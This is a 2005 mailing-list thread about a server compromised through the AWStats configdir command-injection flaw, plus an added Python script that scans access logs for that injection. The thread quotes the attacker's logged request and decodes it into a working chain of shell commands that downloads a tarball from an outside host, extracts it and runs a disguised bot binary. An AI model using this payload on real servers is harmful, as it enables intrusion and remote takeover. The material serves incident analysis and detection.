Re: Security Breach

On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> David Cary Hart wrote:
> > On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
> > 
> >>>  "GET  
> >>>/cgi-bin/awstats.pl? 
> >>>configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 
> >>>0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta 
> >>>r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec 
> >>>ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> 
> (snip)
> 
> >>Thank you for this report.
> >>So you are saying that even with awstats 6.4 you got compromised as
> >>Apache did execute the logged command and a trojan then started running
> >>located in /tmp? If so, would you please be so kind and report that
> >>issue to the awstats project guys as soon as possible?
> > 
> > 
> > Alexander:
> > 
> > Could you explain the series of events? It's not clear - to me - how
> > this resulted in a compromised machine.
> 
> Replace the url-encoded characters and you get:
> 
> /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget 
> zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv 
> mech crond;export PATH=;crond;echo e_exp;%00
> 
> So the attacker has tricked the script into executing a set of shell 
> commands, which include changing directory to /tmp, downloading a 
> tarball from a Romanian site, extracting that tarball and then executing 
> a program from the downloaded and extracted tarball, after renaming it 
> to "crond" in an effort to disguise it.

I got that part. What I am trying to understand (please bear with me) is
how the attacker might have modified the script command line.
-- 
Total Quality Management - A Commitment to Excellence
Fight Spam: http://www.tqmcube.com/rbldnsd.htm
Daily Updates: rsync -t \
tqmcube.com::spamlists/[README.htm][clients][dynamic][relays][asiaspam]
http://www.tqmcube.com/spam_trap.htm
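As an added example that is not part of the original thread: the decoding step Paul does by hand above can be done over a whole Apache access log with a short Python script, which percent-decodes each request line and flags awstats.pl requests whose configdir parameter contains shell metacharacters. The two log lines below are constructed for the example (the first only mirrors the shape of the request quoted in the thread, with the download commands left out); the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (not taken from the original message).
# Line 1 mirrors the shape of the quoted awstats request; line 2 is a benign request.
SAMPLE_LOG = r'''
203.0.113.5 - - [04/Mar/2005:12:00:01 +0000] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3b%2500 HTTP/1.1" 200 485 "-" "-"
198.51.100.9 - - [04/Mar/2005:12:00:02 +0000] "GET /cgi-bin/awstats.pl?config=example.org&output=main HTTP/1.1" 200 10234 "-" "Mozilla/5.0"
'''

# Pull the request target out of a common/combined log format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Characters that have no business in a directory name but do in a shell command line.
SHELL_META = re.compile(r'[|;`$&\x00\n]')


def decode_request(line):
    """Return (decoded path, {param: [decoded values]}) for one log line, or None."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    parts = urlsplit(m.group('target'))
    # parse_qs percent-decodes the values; keep_blank_values keeps "configdir=" with an empty value.
    params = parse_qs(parts.query, keep_blank_values=True)
    return unquote(parts.path), params


def configdir_value(line):
    """Decoded configdir parameter of an awstats.pl request, or None if not applicable."""
    decoded = decode_request(line)
    if decoded is None:
        return None
    path, params = decoded
    if not path.endswith('/awstats.pl'):
        return None
    values = params.get('configdir')
    return values[0] if values else None


def is_injection(line):
    """True when the request's configdir value carries shell metacharacters."""
    value = configdir_value(line)
    return value is not None and SHELL_META.search(value) is not None


def scan_log(log_text):
    """Return [(line number, decoded configdir)] for every flagged line in the log text."""
    hits = []
    for lineno, line in enumerate(log_text.strip().splitlines(), start=1):
        if is_injection(line):
            hits.append((lineno, configdir_value(line)))
    return hits


if __name__ == '__main__':
    for lineno, value in scan_log(SAMPLE_LOG):
        print(f'line {lineno}: configdir={value!r}')
```

The decoded value of the first sample line reads `|echo ;echo b_exp;cd /tmp;%00`, which is the same kind of string Paul shows: a leading pipe followed by a semicolon-separated command list. The `%2500` at the end decodes only once, to a literal `%00`, which is why the check looks for the pipe and semicolons rather than relying on the NUL byte.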